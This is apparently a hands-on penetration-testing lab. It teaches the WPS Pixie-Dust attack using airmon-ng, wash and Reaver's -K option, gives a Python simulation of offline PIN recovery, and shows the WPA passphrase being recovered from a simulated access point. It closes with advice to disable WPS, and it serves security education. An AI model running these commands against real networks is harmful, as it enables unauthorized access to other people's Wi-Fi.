Execute a WPS Pixie-Dust Attack using Reaver

Beginner

Introduction

Wi-Fi Protected Setup (WPS) is a feature designed to make it easy to connect devices to a secure wireless network, using an 8-digit PIN instead of the passphrase. Several implementations, however, contain a critical weakness. The Pixie-Dust attack (published by Dominique Bongard in 2014) targets the way some access points generate the secret nonces used in the WPS PIN handshake. Unlike the standard online brute force, which needs hours of PIN guesses against the AP, a successful Pixie-Dust attack recovers the WPS PIN, and with it the WPA/WPA2 passphrase, in a matter of seconds.

In this lab, you will step into the role of a penetration tester to learn how this attack works. You will use tools from the aircrack-ng suite and Reaver to identify a vulnerable target and execute the Pixie-Dust attack in a simulated environment. This will provide you with a practical understanding of this powerful Wi-Fi hacking technique.

Identify a Target Vulnerable to Pixie-Dust from a wash Scan

In this step, you will begin by scanning for nearby Wi-Fi networks that have WPS enabled. To do this, you first need to put your wireless interface into "monitor mode," which allows it to capture all Wi-Fi traffic in the air, not just traffic addressed to your device. The airmon-ng tool is used for this purpose.

Let's start by enabling monitor mode on the wlan0 interface. In a real scenario, this creates a new virtual interface, typically named wlan0mon.

sudo airmon-ng start wlan0

You should see output confirming that monitor mode has been enabled on a new interface named wlan0mon.

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k           Atheros Communications Inc. AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

Now that you have an interface in monitor mode, you can use the wash tool to scan for WPS-enabled Access Points (APs). wash will list all the WPS networks it detects, along with important information about them.

Run the following command to start the scan on your monitor interface:

sudo wash -i wlan0mon

After a few moments, wash will display a list of networks.

Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID               Ch  WPS Version  WPS Locked  ESSID
----------------------------------------------------------------
00:11:22:33:44:55   6   1.0          No          VulnerableAP
AA:BB:CC:DD:EE:FF   1   1.0          Yes         SecuredAP

From this output, look for a target. WPS Locked must be No: a locked AP refuses PIN attempts, and Pixie-Dust still needs one live WPS exchange to collect its inputs. Unlocked is necessary but not sufficient. Whether the attack succeeds depends on the AP's chipset and firmware (Ralink/MediaTek, Broadcom and some Realtek designs are the classic vulnerable cases), so on real hardware the Vendor column that newer wash builds print, together with the manufacturer and model Reaver reports, is the better predictor. In our case, the network with the ESSID VulnerableAP and BSSID 00:11:22:33:44:55 is our target. Take note of its BSSID, as you will need it in the next steps.

Start Reaver with the -K or --pixie-dust Parameter

In this step, we will prepare to launch the attack using Reaver. Reaver was written to brute-force the WPS registrar PIN online, one guess per WPS session, and to recover the WPA/WPA2 passphrase once the PIN is known.

The maintained fork also supports the much faster Pixie-Dust attack. To enable it, you pass the -K or --pixie-dust command-line argument. Reaver then runs a single WPS exchange only as far as message M3, collects the values the attack needs, and hands them to the separate pixiewps program, which must be installed alongside Reaver. If pixiewps cannot recover the PIN, the AP is most likely not vulnerable to Pixie-Dust, and the only WPS route left is the ordinary online brute force (Reaver without -K), subject to whatever lockout the AP enforces.

The basic structure of the Reaver command for a Pixie-Dust attack looks like this:

sudo reaver -i <monitor_interface> -b <target_bssid> -K

  • sudo reaver: Executes the Reaver tool with root privileges.
  • -i <monitor_interface>: Specifies the network interface that is in monitor mode (e.g., wlan0mon).
  • -b <target_bssid>: Specifies the BSSID (MAC address) of the target access point.
  • -K: This is the crucial switch that tells Reaver to perform a Pixie-Dust attack.

This step is about understanding the command's structure. In the next step, you will combine this knowledge with the information gathered from the wash scan to execute the full command.

Specify the Target BSSID and Monitor Interface

Now it's time to put everything together and launch the attack. You have identified a target BSSID and you know the command structure for a Pixie-Dust attack with Reaver.

Recall from Step 1:

  • Monitor Interface: wlan0mon
  • Target BSSID: 00:11:22:33:44:55

You will now construct the full Reaver command. We will also add the -vv (very verbose) option. This is highly recommended: it prints the values exchanged during the WPS handshake (E-Nonce, PKE, PKR, AuthKey, E-Hash1 and E-Hash2), which are exactly the inputs Pixie-Dust works from, so the output lets you follow the attack step by step.

Execute the following command in your terminal to start the attack:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv

Reaver will now start communicating with the target access point. You will see a series of messages indicating the progress of the WPS handshake. Since the target is vulnerable in our simulated environment, the attack will be very fast.

Understand How Pixie-Dust Exploits Weak Nonce Generation

In this step, you will analyze the output from the Reaver command to understand the mechanics of the Pixie-Dust attack. This is a conceptual step with no new commands to run.

Look at the verbose output generated by Reaver in the previous step. You should see lines prefixed with [P], which display the values captured during the WPS exchange:

...
[+] Received M1 message
[P] E-Nonce: d3b25a26a713c1b21a84a5e22236aebd
[P] PKE: c1...e2
[+] Sending M2 message
[P] PKR: 3a...b1
[P] AuthKey: 8c...99
[+] Received M3 message
[P] E-Hash1: 7d...c3
[P] E-Hash2: 9f...a5
...

Here's what's happening:

  1. WPS Handshake: Reaver acts as an external registrar and the AP as the enrollee. M1 comes from the AP and carries its public nonce E-Nonce and Diffie-Hellman public key PKE; Reaver answers in M2 with its own nonce and public key PKR. Both sides then derive AuthKey from the Diffie-Hellman shared secret and the two public nonces, which is why Reaver can print it.
  2. The Commitments: In M3 the AP sends E-Hash1 and E-Hash2. Each is an HMAC-SHA256 under AuthKey over a secret nonce (E-S1 or E-S2), the PSK derived from one half of the PIN, PKE and PKR. The secret nonces themselves are never transmitted. With 128 random bits hidden behind each hash, a PIN half cannot be tested offline, which is why WPS normally has to be brute-forced one PIN per online round trip.
  3. The Flaw: On vulnerable APs E-S1 and E-S2 are not random. Some Ralink-based firmware sets them to zero; some Broadcom and Realtek implementations take them from the same weak pseudo-random generator (seeded from the clock, or with a recoverable internal state) that produced the public E-Nonce. Given E-Nonce, the attacker can reproduce E-S1 and E-S2.
  4. Offline Cracking: Reaver hands PKE, PKR, AuthKey, E-Nonce, E-Hash1 and E-Hash2 to pixiewps, which recomputes the hashes for every candidate. The first half of the PIN has 10,000 possibilities and the second half 1,000 (its last digit is a checksum), and each half is checked against its own hash, so at most 11,000 HMAC computations settle the PIN on your own machine.

Because the search runs offline, the AP sees only one aborted WPS session: its lockout and rate-limiting never trigger, and the PIN is found almost instantly. Reaver then completes a normal WPS exchange with the recovered PIN, and the AP hands over the WPA PSK.
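To make the offline step concrete, here is an added Python example; it is not part of the original lab and is not Reaver or pixiewps code. It simulates an AP whose E-S1 and E-S2 are all zeros, as on the vulnerable Ralink-based firmware, builds E-Hash1 and E-Hash2 with the WPS formulas, and then recovers the PIN from only the values a registrar sees. The AuthKey, PKE and PKR are constructed random bytes standing in for the real key-derivation and Diffie-Hellman outputs; a second simulated AP with random secret nonces shows why the same search fails against a correct implementation.

```python
import hashlib
import hmac
import os

# Added example: simulate the WPS M3 commitments of a vulnerable AP and recover
# the PIN offline. All inputs are constructed; a real run would take AuthKey,
# PKE, PKR, E-Hash1 and E-Hash2 from Reaver's [P] lines.


def wps_checksum(pin7: int) -> int:
    """Checksum digit that turns a 7-digit PIN body into a valid 8-digit WPS PIN."""
    accum, t = 0, pin7
    while t:
        accum += 3 * (t % 10)   # digits 7, 5, 3, 1 (counted from the right) weigh 3
        t //= 10
        accum += t % 10         # digits 6, 4, 2 weigh 1
        t //= 10
    return (10 - accum % 10) % 10


def psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of one PIN half)."""
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/E-Hash2: HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()


def ap_m3_hashes(authkey, pke, pkr, pin, e_s1, e_s2):
    """What the enrollee (AP) puts in M3. Only the hashes go on the air, never E-S1/E-S2."""
    return (e_hash(authkey, e_s1, psk_half(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, e_s2, psk_half(authkey, pin[4:]), pke, pkr))


def pixie_dust(authkey, pke, pkr, e_hash1, e_hash2, e_s1, e_s2):
    """Offline PIN recovery given predicted secret nonces.

    Each half is tested against its own hash: 10^4 candidates for the first
    half and 10^3 for the second (its last digit is the checksum), so at most
    11,000 HMACs instead of 10^8, with no further frames sent to the AP.
    """
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        if e_hash(authkey, e_s1, psk_half(authkey, half), pke, pkr) == e_hash1:
            first = half
            break
    if first is None:
        return None
    for j in range(1_000):
        half = f"{j:03d}{wps_checksum(int(first) * 1000 + j)}"
        if e_hash(authkey, e_s2, psk_half(authkey, half), pke, pkr) == e_hash2:
            return first + half
    return None


def demo(weak_nonces: bool, pin: str = "12345670"):
    """Run the attack against a simulated AP; weak_nonces=True models E-S1 = E-S2 = 0."""
    authkey = os.urandom(32)                       # constructed stand-in for the KDF output
    pke, pkr = os.urandom(192), os.urandom(192)    # constructed stand-ins for 1536-bit DH public keys
    if weak_nonces:
        e_s1 = e_s2 = bytes(16)                    # the Ralink flaw: constant zero secret nonces
    else:
        e_s1, e_s2 = os.urandom(16), os.urandom(16)  # correct implementation: fresh random nonces
    e_hash1, e_hash2 = ap_m3_hashes(authkey, pke, pkr, pin, e_s1, e_s2)
    # The attacker predicts zero nonces in both cases; only the weak AP confirms the guess.
    return pixie_dust(authkey, pke, pkr, e_hash1, e_hash2, bytes(16), bytes(16))


if __name__ == "__main__":
    print("weak AP   :", demo(True))    # recovers 12345670
    print("correct AP:", demo(False))   # None: neither half can be confirmed offline
```

The two runs make the point of the lab's explanation: the commitments are the same HMACs in both cases, and the only difference is whether the 16 bytes in front of the PIN-derived PSK are guessable. Against the correct AP the search exhausts all 10,000 first-half candidates without a match and gives up, which is exactly where an attacker would have to fall back to online guessing.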

Observe the Near-Instantaneous Recovery of the PIN and Key

In this final step, you will observe the successful outcome of the attack. After Reaver performs the offline calculations, it will display the recovered credentials.

The final part of the Reaver output from Step 3 should look like this:

...
[+] Pixie-Dust attack...
[+] 100.00% complete @ 2023-10-27 10:30:00 (0 seconds remaining)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretPassword'
[+] AP SSID: 'VulnerableAP'

Let's break down the recovered information:

  • WPS PIN: '12345670': This is the 8-digit PIN of the router itself (the enrollee PIN), not a one-time client PIN. It rarely changes, so anyone holding it can register with the AP as a WPS registrar and be handed the current passphrase again, even after the network owner changes the Wi-Fi password.
  • WPA PSK: 'SuperSecretPassword': This is the WPA/WPA2 Pre-Shared Key, which is the actual Wi-Fi password for the network. This is the ultimate goal of the attack.
  • AP SSID: 'VulnerableAP': This confirms the name of the network you have successfully compromised.

The most remarkable aspect is the speed. Note the "0 seconds remaining" in the output. The entire process, from initiating the handshake to recovering the key, took only a few seconds. This stands in stark contrast to a traditional WPS brute-force attack, which could take many hours or even be impossible if the AP locks WPS after several failed attempts. You have now successfully demonstrated the effectiveness of the WPS Pixie-Dust attack.

Summary

In this lab, you successfully executed a WPS Pixie-Dust attack in a simulated environment. You have gained hands-on experience with essential Wi-Fi security assessment tools and concepts.

You learned to:

  • Use airmon-ng to enable monitor mode on a wireless interface.
  • Use wash to scan for and identify WPS-enabled access points.
  • Understand the purpose of the -K (--pixie-dust) flag in Reaver.
  • Execute a targeted Pixie-Dust attack using reaver, specifying the target's BSSID.
  • Interpret the output to understand how the attack exploits weak nonce generation.
  • Observe the near-instantaneous recovery of both the WPS PIN and the WPA PSK.

This lab highlights a significant real-world vulnerability. The most effective defense against this and other WPS-related attacks is to disable the WPS feature entirely in the router's administration settings, and then to confirm the change with a wash scan: some firmware keeps answering WPS requests even after the feature is switched off in the web interface, and in that case only a firmware update or a different device removes the exposure.